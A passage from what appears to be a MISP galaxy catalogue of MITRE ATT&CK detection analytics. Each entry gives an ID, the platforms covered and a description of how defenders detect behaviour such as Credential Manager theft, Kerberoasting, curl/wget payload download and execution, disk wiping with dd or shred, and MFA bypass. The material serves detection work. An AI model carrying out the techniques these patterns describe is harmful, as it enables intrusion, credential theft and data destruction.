UUID ddbf61e2-7dad-40ef-90ef-7bec707b50fd which can be used as unique global reference for Analytic 0737 - AN0737 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0737
mitre_platforms ['Windows']

Analytic 0837 - AN0837

ESXi hypervisor permission modification behavioral chain: (1) SSH access to ESXi host, (2) chmod/chown execution on VMFS datastore files or system configuration, (3) Modification of VM configuration files (.vmx) or virtual disk permissions, (4) Hostd service log correlation, (5) vCenter permission change events if centrally managed

Internal MISP references

UUID 13a1653f-3d4e-4a4f-9619-f8e8a97ec60d which can be used as unique global reference for Analytic 0837 - AN0837 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0837
mitre_platforms ['ESXi']

Analytic 0378 - AN0378

Detects unauthorized access to Windows Credential Manager through anomalous process execution (vaultcmd.exe, rundll32.exe keymgr.dll), suspicious API calls (CredEnumerateA), or direct file access to Credential Locker files. Correlates process creation with subsequent file reads of .vcrd/.vpol files under user Credential Locker directories.

Internal MISP references

UUID 207b58a9-7e3b-41ca-bb5a-c66b24210a83 which can be used as unique global reference for Analytic 0378 - AN0378 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0378
mitre_platforms ['Windows']

Analytic 0873 - AN0873

Detection of browser-based downloads from HTML sources that trigger file creation in temp or user directories followed by execution of new files within short timeframes and suspicious parent-child lineage.

Internal MISP references

UUID 30ae2215-5dd5-4ef2-82bd-965781ef1f42 which can be used as unique global reference for Analytic 0873 - AN0873 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0873
mitre_platforms ['Linux']

Analytic 0783 - AN0783

Detects sequential command-line compression utilities (e.g., gzip, tar, zip, 7z) followed by execution of unpacked files, especially in temp directories or under non-standard locations like /dev/shm or /tmp with ELF binaries.

Internal MISP references

UUID 55083ce8-b00e-4501-97db-829082bdbb48 which can be used as unique global reference for Analytic 0783 - AN0783 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0783
mitre_platforms ['Linux']

Analytic 0387 - AN0387

Execution of destructive CLI commands such as 'erase startup-config', 'erase flash:' or 'format disk' on routers/switches. Detect privilege level escalation preceding destructive commands.

Internal MISP references

UUID 8faa753d-ec3f-4694-9a33-03ce4ccb722f which can be used as unique global reference for Analytic 0387 - AN0387 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0387
mitre_platforms ['Network Devices']

Analytic 0738 - AN0738

Detects the use of mail utilities like mail or mailx to delete mailbox content, or file-level deletion of inbox files from /var/spool/mail/ or /var/mail/ following suspicious sessions.

Internal MISP references

UUID 9933242a-f96e-4b3e-896f-e7335f410a4f which can be used as unique global reference for Analytic 0738 - AN0738 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0738
mitre_platforms ['Linux']

Analytic 0397 - AN0397

Script-based execution of sleep loops or time delay commands (e.g., sleep, ping delay, while-loops) followed by file creation or network connections.

Internal MISP references

UUID 2bbe41df-b8a6-4503-8fb0-028b7387cb1d which can be used as unique global reference for Analytic 0397 - AN0397 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0397
mitre_platforms ['Linux']

Analytic 0973 - AN0973

Detects abuse of fileless storage mechanisms such as Registry keys, WMI classes, and Event Logs used to stage payloads, scripts, or encoded content outside traditional files.

Internal MISP references

UUID 4f5f4b26-0bf0-4f3d-b8ac-1af660923bd2 which can be used as unique global reference for Analytic 0973 - AN0973 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0973
mitre_platforms ['Windows']

Analytic 0793 - AN0793

Monitor mail server logs (Postfix, Sendmail, Exim) for anomalous From headers mismatching authenticated SMTP identities. Detect abnormal relay attempts, spoofed envelope-from values, or large-scale outbound campaigns targeting internal users.

Internal MISP references

UUID 5c7a8194-f0cb-498a-98c6-5928859bf79f which can be used as unique global reference for Analytic 0793 - AN0793 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0793
mitre_platforms ['Linux']

Analytic 0379 - AN0379

Detects unauthorized use of SMTP/IMAP/POP3 by suspicious binaries (e.g., PowerShell, rundll32) to exfiltrate data or beacon via email, often bypassing proxy or content filters.

Internal MISP references

UUID aef3d563-19f5-4d52-b7ad-4c4abadcb568 which can be used as unique global reference for Analytic 0379 - AN0379 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0379
mitre_platforms ['Windows']

Analytic 0739 - AN0739

Detects removal of Apple Mail artifacts via AppleScript or direct deletion of mailbox content in ~/Library/Mail/, especially when preceded by Remote Login or C2-related API access.

Internal MISP references

UUID cd10c7fd-edef-4f85-aff3-9eaa35906b18 which can be used as unique global reference for Analytic 0739 - AN0739 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0739
mitre_platforms ['macOS']

Analytic 0937 - AN0937

Cloud API calls disabling snapshot scheduling, backup policies, or versioning, followed by DeleteSnapshot/DeleteVolume operations.

Internal MISP references

UUID e50f8247-73da-4461-a560-745ed84f1209 which can be used as unique global reference for Analytic 0937 - AN0937 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0937
mitre_platforms ['IaaS']

Analytic 0838 - AN0838

Detect anomalous chains of memory allocation and execution inside the same process (e.g., VirtualAlloc → memcpy → VirtualProtect → CreateThread). Unlike process injection, reflective code loading does not perform cross-process memory writes — the suspicious activity occurs entirely within the process’s own PID context.

Internal MISP references

UUID 2432f5a3-ddae-4138-9981-f916ad23a1e1 which can be used as unique global reference for Analytic 0838 - AN0838 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0838
mitre_platforms ['Windows']

Analytic 0883 - AN0883

Execution of destructive utilities (dd, shred, wipe) targeting block devices, or processes invoking syscalls to directly overwrite /dev/sd or /dev/nvme partitions. Correlate abnormal file write attempts with shell process execution and block device access.

Internal MISP references

UUID b55c84a0-d045-43f6-a5a9-e8f6edbd275e which can be used as unique global reference for Analytic 0883 - AN0883 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0883
mitre_platforms ['Linux']

Analytic 0388 - AN0388

Execution of InstallUtil.exe from .NET framework directories with arguments specifying non-standard or attacker-supplied assemblies, especially when followed by suspicious child process creation or script execution. Detection also includes correlation of newly created binaries prior to InstallUtil invocation and anomalous command-line usage compared to historical baselines.

Internal MISP references

UUID f3478623-5b5c-482e-96f1-6b225ff8fa70 which can be used as unique global reference for Analytic 0388 - AN0388 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0388
mitre_platforms ['Windows']

Analytic 0938 - AN0938

Correlation of a package install event with execution of postinstall scripts containing unknown binaries or abnormal CLI usage. Look for /usr/sbin/installer execution followed by child processes originating from the postinstall script.

Internal MISP references

UUID 3ae8f3c1-c3a1-4c45-9231-1bb6f9c61ee1 which can be used as unique global reference for Analytic 0938 - AN0938 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0938
mitre_platforms ['macOS']

Analytic 0983 - AN0983

Detects processes or binaries executed from trusted directories (e.g., System32) or using trusted names (e.g., svchost.exe) where the metadata, hash, or parent process does not align with legitimate activity patterns.

Internal MISP references

UUID 61256fb2-d490-4e1d-b308-665a2d68ec64 which can be used as unique global reference for Analytic 0983 - AN0983 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0983
mitre_platforms ['Windows']

Analytic 0389 - AN0389

Detects credential harvesting via userland API hooking (e.g., SetWindowsHookEx, IAT, or inline patching) by correlating memory modifications with hook installation functions and suspicious module loads in credential-sensitive processes like lsass.exe, explorer.exe, or winlogon.exe.

Internal MISP references

UUID 89e3c3a3-249e-4af3-8885-92c228d88b02 which can be used as unique global reference for Analytic 0389 - AN0389 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0389
mitre_platforms ['Windows']

Analytic 0839 - AN0839

Monitor for in-process mmap + mprotect + execve/execveat activity where memory permissions are changed from writable to executable inside the same process without a corresponding ELF on disk.

Internal MISP references

UUID cfdd2422-7e68-417a-9298-062bac59df0c which can be used as unique global reference for Analytic 0839 - AN0839 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0839
mitre_platforms ['Linux']

Analytic 0893 - AN0893

Execution of commands disabling AAA, logging, or security features on routers/switches. Detect privilege escalation followed by config changes that disable defense mechanisms.

Internal MISP references

UUID dc5bfda5-057d-4bec-b3e6-a6b2117a4134 which can be used as unique global reference for Analytic 0893 - AN0893 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0893
mitre_platforms ['Network Devices']

Analytic 0398 - AN0398

Use of usleep, nanosleep, or NSTimer calls in executables or binaries with no GUI interaction, especially followed by disk/network activity.

Internal MISP references

UUID fbbe7372-5d33-4181-a68a-e68f5da94df7 which can be used as unique global reference for Analytic 0398 - AN0398 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0398
mitre_platforms ['macOS']

Analytic 0939 - AN0939

Detection of maintainer scripts (e.g., postinst, preinst) being modified or executed during dpkg or rpm operations. Watch for script content that spawns additional processes or writes outside package scope.

Internal MISP references

UUID 2f9c7e44-de3a-4fbd-955a-482ef9f341ed which can be used as unique global reference for Analytic 0939 - AN0939 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0939
mitre_platforms ['Linux']

Analytic 0399 - AN0399

Detects unauthorized or anomalous use of command-line interfaces (CLI) on network devices. Focuses on remote access sessions (e.g., SSH/Telnet), privilege escalation within CLI sessions, execution of high-risk commands (e.g., config replace, terminal monitor, no logging), and configuration changes outside of approved windows.

Internal MISP references

UUID 3dc28690-699a-4f6d-ad4b-278aa2dd8c59 which can be used as unique global reference for Analytic 0399 - AN0399 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0399
mitre_platforms ['Network Devices']

Analytic 0993 - AN0993

Detect curl/wget commands saving executable/script payloads to /tmp or /var/tmp followed by execution. Monitor packet captures or IDS/IPS alerts for injected responses or mismatched content types.

Internal MISP references

UUID 5e8af32c-5246-43e1-a7d9-c4d263c7b135 which can be used as unique global reference for Analytic 0993 - AN0993 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0993
mitre_platforms ['Linux']

Analytic 0444 - AN0444

Detects Kerberoasting attempts by monitoring for anomalous Kerberos TGS requests (Event ID 4769) with RC4 encryption (etype 0x17), accounts requesting an unusual number of service tickets in a short period, or service accounts targeted outside normal usage baselines. Also correlates suspicious process activity (e.g., Mimikatz invoking LSASS access) with Kerberos ticket anomalies.

Internal MISP references

UUID 4ab972bf-623b-418b-9647-2c3a56b55083 which can be used as unique global reference for Analytic 0444 - AN0444 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0444
mitre_platforms ['Windows']

Analytic 0544 - AN0544

Detects conditional access policy changes, exclusion of accounts from MFA enforcement, or registration of new MFA factors by non-admin or anomalous users.

Internal MISP references

UUID 33b7f7b2-b79c-4893-bd5c-2d5638bf5786 which can be used as unique global reference for Analytic 0544 - AN0544 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0544
mitre_platforms ['Identity Provider']

Analytic 0454 - AN0454

Detect user account logon attempts that trigger multiple MFA challenges through enterprise identity integrations, especially if MFA push requests are generated without successful interactive login.

Internal MISP references

UUID 801a3652-8772-4b69-8a13-d870be653ef0 which can be used as unique global reference for Analytic 0454 - AN0454 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0454
mitre_platforms ['macOS']

Analytic 0445 - AN0445

Detection of msiexec.exe execution where command-line arguments reference remote MSI packages, UNC paths, HTTP/HTTPS URLs, or DLLs, correlated with subsequent module loads and/or network connections to previously unseen destinations. The behavioral chain links process creation of msiexec.exe with suspicious parameters, network activity to retrieve payloads, and module loading indicative of malicious installation or DLL execution.

Internal MISP references

UUID f27c0482-fbea-47a3-9b19-7302a058a9e5 which can be used as unique global reference for Analytic 0445 - AN0445 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0445
mitre_platforms ['Windows']

Analytic 0644 - AN0644

Monitors Gatekeeper, spctl, and unified log entries for binaries executed with unexpected or untrusted signatures. Correlates file metadata changes with process launches where signature validation is skipped, altered, or fails but the process still executes.

Internal MISP references

UUID 969bd6a3-b89f-4279-9bd2-3fc461880308 which can be used as unique global reference for Analytic 0644 - AN0644 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0644
mitre_platforms ['macOS']

Analytic 0446 - AN0446

Detection of USB-based remote access hardware (e.g., TinyPilot, PiKVM) attached to the host via drive or peripheral enumeration, triggering vendor identifiers or unusual EDID announcements.

Internal MISP references

UUID e1e76ffd-b452-429e-8ea0-a25ba877a2b5 which can be used as unique global reference for Analytic 0446 - AN0446 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0446
mitre_platforms ['Windows']

Analytic 0464 - AN0464

A process opens /dev/bpf* (libpcap) or loads a NetworkExtension filter; then, after a crafted inbound packet, the same process initiates an outbound connection to the trigger origin.

Internal MISP references

UUID e6d04b50-7bdc-480e-9bda-291db9b270f6 which can be used as unique global reference for Analytic 0464 - AN0464 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0464
mitre_platforms ['macOS']

Analytic 0447 - AN0447

Insertion of USB-based hardware proxies (e.g., PiKVM) which register under predictable names (e.g., tinypilot) or mount under known paths (e.g., /opt/tinypilot-privileged).

Internal MISP references

UUID 04e9470e-676f-4af0-add4-8103300ebd19 which can be used as unique global reference for Analytic 0447 - AN0447 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0447
mitre_platforms ['Linux']

Analytic 0744 - AN0744

Sudden spikes in cloud VM CPU usage with outbound traffic to mining pools and unauthorized instance creation.

Internal MISP references

UUID 8e1872c2-906c-4cf8-b0c7-afd448fe1c0b which can be used as unique global reference for Analytic 0744 - AN0744 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0744
mitre_platforms ['IaaS']

Analytic 0474 - AN0474

Firmware flash utility invoked with elevated privileges followed by raw access to firmware device path or changes to boot configuration.

Internal MISP references

UUID a0ecdd41-a051-4ada-9ec1-c29dc0c4ac61 which can be used as unique global reference for Analytic 0474 - AN0474 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0474
mitre_platforms ['Windows']

Analytic 0484 - AN0484

Forged web cookies on Windows endpoints can be detected by monitoring unusual modifications of browser cookie stores (e.g., Chrome SQLite DB, Edge cache) by processes outside of browsers, followed by authentication events to SaaS or IaaS services. Defenders may observe processes writing directly to cookie storage paths or injecting tokens into browser sessions.

Internal MISP references

UUID 305c684a-2b36-4209-9d00-778ed16de763 which can be used as unique global reference for Analytic 0484 - AN0484 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0484
mitre_platforms ['Windows']

Analytic 0844 - AN0844

A source performs a closed-port sequence; the endpoint enables a PF/socketfilterfw rule or a background process binds a port; then a successful connection completes from the same source.

Internal MISP references

UUID 39da0718-fa22-4f77-8bd2-ea8300087658 which can be used as unique global reference for Analytic 0844 - AN0844 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0844
mitre_platforms ['macOS']

Analytic 0448 - AN0448

Attachment of hardware-backed USB KVM devices (e.g., TinyPilot) that enumerate new HID or serial communication interfaces with identifiable metadata.

Internal MISP references

UUID fc3e13fd-cbee-4bb0-aae7-ce1e8af7d768 which can be used as unique global reference for Analytic 0448 - AN0448 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0448
mitre_platforms ['macOS']

Analytic 0494 - AN0494

Detects exploitation of authentication daemons or PAM modules. Defender perspective includes failed or anomalous PAM authentications, abnormal segfaults in authentication services, and exploitation attempts followed by successful unauthorized logins. Correlation identifies memory corruption, replay attempts, and privilege escalation tied to credential services.

Internal MISP references

UUID 3f3ae0da-3005-42d7-afa3-8eaa8da3f700 which can be used as unique global reference for Analytic 0494 - AN0494 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0494
mitre_platforms ['Linux']

Analytic 0944 - AN0944

Detects usage of the at command to schedule jobs, followed by job execution and modification of job files under /var/spool/cron/atjobs.

Internal MISP references

UUID 70e28077-c8a6-425f-94c7-a74a7140c7ce which can be used as unique global reference for Analytic 0944 - AN0944 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0944
mitre_platforms ['Linux']

Analytic 0449 - AN0449

Monitor for excessive or anomalous MFA push notifications or token requests, especially when login attempts originate from unusual IPs or geolocations and do not correspond to legitimate user-initiated sessions.

Internal MISP references

UUID f51edea3-e0e8-4090-8e81-a01c3394ba53 which can be used as unique global reference for Analytic 0449 - AN0449 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0449
mitre_platforms ['Identity Provider']

Analytic 0545 - AN0545

Detects API calls to cloud secrets/MFA configurations where MFA enforcement policies are disabled or bypassed.

Internal MISP references

UUID 3090db89-83c0-44bc-a17d-7cb2a6aecb87 which can be used as unique global reference for Analytic 0545 - AN0545 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0545
mitre_platforms ['IaaS']

Analytic 0554 - AN0554

Suspicious rule creation within Outlook or Exchange clients, including auto-move or delete conditions tied to incident or security alert keywords. Defender perspective: correlation between missing inbound emails and newly added mailbox rules.

Internal MISP references

UUID 747a2974-0c77-4c47-9c02-2775025327c6 which can be used as unique global reference for Analytic 0554 - AN0554 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0554
mitre_platforms ['Office Suite']

Analytic 0455 - AN0455

Cause→effect chain: (1) a user or service spawns a shell/PowerShell that queries local/domain password policy via commands/cmdlets (e.g., net accounts, Get-ADDefaultDomainPasswordPolicy, secedit /export); (2) optional directory/LDAP reads from DCs; (3) the same principal performs adjacent Discovery or credential-related actions within a short window. Correlate Sysmon process creation with PowerShell ScriptBlock and Security logs.

Internal MISP references

UUID ae82099a-0baf-4887-953c-67ef5e2d4470 which can be used as unique global reference for Analytic 0455 - AN0455 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0455
mitre_platforms ['Windows']

Analytic 0465 - AN0465

Defenders may observe unauthorized or anomalous changes to NAT configurations, including the addition of new translation rules or modifications to existing ones. Suspicious behaviors include sudden introduction of NAT mappings bridging segmented networks, new port address translation rules that obscure true source IPs, or traffic flows inconsistent with expected network design. Multi-event correlation includes detecting configuration changes on routers/firewalls, followed by traffic traversing unexpected internal/external address pairs.

Internal MISP references

UUID 72033f2d-a943-40be-862c-051317ec541c which can be used as unique global reference for Analytic 0465 - AN0465 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0465
mitre_platforms ['Network Devices']

Analytic 0654 - AN0654

Suspicious modification of file artifacts (e.g., logs, ISO templates) on ESXi datastores, followed by beaconing or POST operations to external IPs potentially hiding payloads in file-like traffic.

Internal MISP references

UUID 80caf81c-0714-4fa5-8b77-8e2144e316b9 which can be used as unique global reference for Analytic 0654 - AN0654 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0654
mitre_platforms ['ESXi']

Analytic 0645 - AN0645

Detects adversarial abuse of systemd timers by correlating file creation/modification of .timer and .service units in system directories with the execution of abnormal child processes launched by 'systemd' (PID 1), especially as root.

Internal MISP references

UUID a80f58c9-deb2-45ed-a8fb-4f3df5082874 which can be used as unique global reference for Analytic 0645 - AN0645 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0645
mitre_platforms ['Linux']

Analytic 0456 - AN0456

Chain: (1) interactive/non-interactive chage -l, grep/cat of PAM config (e.g., /etc/pam.d/common-password, /etc/security/pwquality.conf); (2) optional reads of /etc/login.defs; (3) same user performs account enumeration or password change attempts shortly after. Use auditd execve and file read events plus shell history collection.

Internal MISP references

UUID bcf6e9cb-fee9-4efd-8998-03de4908448b which can be used as unique global reference for Analytic 0456 - AN0456 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0456
mitre_platforms ['Linux']

Analytic 0546 - AN0546

Detects PAM module modifications or removal of MFA hooks in /etc/pam.d/ configurations, correlated with successful authentications lacking MFA prompts.

Internal MISP references

UUID d0a9cbc4-d190-44fb-b067-27153e35dc49 which can be used as unique global reference for Analytic 0546 - AN0546 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0546
mitre_platforms ['Linux']

Analytic 0564 - AN0564

Suspicious outbound HTTPS connections where the TLS Server Name Indication (SNI) does not match the HTTP Host header, indicating potential use of domain fronting to mask C2 traffic via CDNs.

Internal MISP references

UUID e5cb92b6-75b0-4eed-aa1e-4ea529f50fbb which can be used as unique global reference for Analytic 0564 - AN0564 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0564
mitre_platforms ['Windows']

Analytic 0547 - AN0547

Detects modifications to authorization plugins responsible for MFA enforcement and correlates with suspicious login sessions missing MFA prompts.

Internal MISP references

UUID 3a19d0ff-833f-47ae-81a0-2516e91c7b25 which can be used as unique global reference for Analytic 0547 - AN0547 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0547
mitre_platforms ['macOS']

Analytic 0457 - AN0457

Chain: (1) execution of pwpolicy or MDM/DirectoryService reads of account policies; (2) optional read of /Library/Preferences/com.apple.loginwindow or config profiles; (3) follow-on credential probing or lateral movement by same user/session. Use unified logs and process telemetry.

Internal MISP references

UUID 4f71c7bd-dd25-43c7-ac5c-7a85c7588759 which can be used as unique global reference for Analytic 0457 - AN0457 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0457
mitre_platforms ['macOS']

Analytic 0475 - AN0475

Direct write access to /dev/mem or /sys/firmware combined with usage of firmware flashing utilities (e.g., flashrom).

Internal MISP references

UUID 5b1514b3-e35b-4ea8-bcc1-b8e492d6d3cd which can be used as unique global reference for Analytic 0475 - AN0475 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0475
mitre_platforms ['Linux']

Analytic 0745 - AN0745

High CPU usage by unauthorized containers running mining binaries or public proxy tools.

Internal MISP references

UUID 791ea4ff-7a49-4aa7-a41c-51288031e0f0 which can be used as unique global reference for Analytic 0745 - AN0745 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0745
mitre_platforms ['Containers']

Analytic 0754 - AN0754

vSphere API logins (vimService) or SSH to ESXi host followed by unauthorized shell commands or lateral remote logins from the ESXi host.

Internal MISP references

UUID 8a534291-3b75-45ba-9f7b-b952251a3f03 which can be used as unique global reference for Analytic 0754 - AN0754 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0754
mitre_platforms ['ESXi']

Analytic 0574 - AN0574

Detects enumeration of VMs using PowerShell (Get-VM), VMware Workstation (vmrun.exe), or Hyper-V (VBoxManage.exe). Defender observes suspicious command lines executed by unexpected users or outside normal administrative sessions.

Internal MISP references

UUID be2239de-ae8e-442d-a9f6-d34460b94e94 which can be used as unique global reference for Analytic 0574 - AN0574 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0574
mitre_platforms ['Windows']

Analytic 0458 - AN0458

Chain: (1) cloud API calls that fetch tenant/organization password policy (e.g., AWS GetAccountPasswordPolicy, GCP/OCI equivalents or IAM settings reads); (2) within a short window, the same principal creates users, rotates creds, or changes auth settings. Use cloud audit logs.

Internal MISP references

UUID 12f9a28b-126d-48b1-bc93-5bc3c1635905 which can be used as unique global reference for Analytic 0458 - AN0458 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0458
mitre_platforms ['IaaS']

Analytic 0584 - AN0584

Excessive resource exhaustion or service crash induced by processes launched by users or scripts that rapidly consume CPU/memory or attempt malformed service interactions.

Internal MISP references

UUID 3102edb4-6947-4cef-9660-4a35d582a716 which can be used as unique global reference for Analytic 0584 - AN0584 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0584
mitre_platforms ['Windows']

Analytic 0485 - AN0485

On Linux, defenders may observe forged cookie activity as unauthorized modifications to browser cookie databases (e.g., ~/.mozilla/firefox/*/cookies.sqlite, ~/.config/chromium/Default/Cookies) or scripted injection of session tokens. Suspicious usage includes curl/wget commands embedding forged cookies in headers, correlated with abnormal session activity in SaaS or IaaS logs.

Internal MISP references

UUID 7b981ab1-eb5f-4ad0-a819-90db819a4431 which can be used as unique global reference for Analytic 0485 - AN0485 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0485
mitre_platforms ['Linux']

Analytic 0548 - AN0548

Detects suspicious MFA method changes, such as registration of weaker factors (e.g., SMS), or removal of MFA requirements for specific accounts or groups.

Internal MISP references

UUID 81c940cd-633b-4f88-9f8f-f6837a7026bc which can be used as unique global reference for Analytic 0548 - AN0548 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0548
mitre_platforms ['SaaS']

Analytic 0854 - AN0854

Adversary modifies GPO containers or files under SYSVOL using LDAP, ADSI, PowerShell (e.g., New-GPOImmediateTask) or GUI tools. This includes directory object changes (e.g., gPCFileSysPath), delegation assignments (SeEnableDelegationPrivilege), and SYSVOL file writes (ScheduledTasks.xml, GptTmpl.inf).

Internal MISP references

UUID ec6e1f3c-e9ff-4944-a426-863eaf9979ea which can be used as unique global reference for Analytic 0854 - AN0854 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0854
mitre_platforms ['Windows']

Analytic 0845 - AN0845

A router/switch receives a knock pattern (the same source touches the device's unicast, broadcast, and network addresses on the same or stepped ports), followed by an ACL/line-vty/service enable and the first successful management session.

Internal MISP references

UUID fe82e2a6-a928-4fe0-a899-fead90eabb29 which can be used as unique global reference for Analytic 0845 - AN0845 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0845
mitre_platforms ['Network Devices']

Analytic 0459 - AN0459

Chain: (1) IdP policy/read operations by a principal (e.g., Microsoft Entra/Graph requests to read password or authentication policies); (2) adjacent risky changes (role assignment, app consent) by same principal. Use IdP audit logs.

Internal MISP references

UUID 0b0d50a0-d07b-4cf1-9cb0-23c95e8321b2 which can be used as unique global reference for Analytic 0459 - AN0459 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0459
mitre_platforms ['Identity Provider']

Analytic 0549 - AN0549

Detects MFA bypass attempts by modifying tenant-wide authentication policies or excluding high-value accounts from MFA enforcement.

Internal MISP references

UUID 1193139d-0032-4d0b-88f1-c140abe2c964 which can be used as unique global reference for Analytic 0549 - AN0549 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0549
mitre_platforms ['Office Suite']

Analytic 0594 - AN0594

Direct login to cloud-hosted virtual machines via cloud-native access methods (e.g., EC2 Instance Connect, Azure Serial Console, SSM), followed by command execution or privilege escalation on the VM.

Internal MISP references

UUID 926f4550-8c47-4882-afb3-1f0832c8d3b9 which can be used as unique global reference for Analytic 0594 - AN0594 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0594
mitre_platforms ['IaaS']

Analytic 0945 - AN0945

Detects user or root invocation of the at command to schedule a job, followed by job execution via LaunchServices and activity in /usr/lib/cron/at.

Internal MISP references

UUID 98ce32fb-1b91-4487-9e5a-951375f2380e which can be used as unique global reference for Analytic 0945 - AN0945 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0945
mitre_platforms ['macOS']

Analytic 0495 - AN0495

Detects exploitation attempts against macOS authentication frameworks such as OpenDirectory or Keychain. Defender perspective includes abnormal crashes in opendirectoryd, unauthorized Keychain API usage, and unusual sudo or login events. Correlation links unexpected process behavior with credential access anomalies.

Internal MISP references

UUID bb339113-e807-45fe-99c4-ed8348e51b36 which can be used as unique global reference for Analytic 0495 - AN0495 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0495
mitre_platforms ['macOS']

Analytic 0954 - AN0954

Use of stolen Kerberos tickets or token impersonation resulting in logon sessions from accounts without expected interactive logon events.

Internal MISP references

UUID e7ce6bda-a4d3-43a4-afa0-34d57c34ef0d which can be used as unique global reference for Analytic 0954 - AN0954 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0954
mitre_platforms ['Windows']

Analytic 0466 - AN0466

Detects adversary behavior where the command-line arguments of a running process are overwritten in memory to spoof the process name, typically replacing it with a benign or misleading string. The detection correlates unexpected null byte sequences, discrepancies between /proc/<pid>/cmdline and process ancestry, and suspicious memory writes shortly after process start.

Internal MISP references

UUID 10d8886b-6cf6-45af-b187-04541e2ffaa4 which can be used as unique global reference for Analytic 0466 - AN0466 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0466
mitre_platforms ['Linux']

Analytic 0664 - AN0664

Adversary modifies internal or external site content through manipulated application bundles, hosted content, or web server configs.

Internal MISP references

UUID 3258db60-8500-4935-837c-78b23f2d83d1 which can be used as unique global reference for Analytic 0664 - AN0664 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
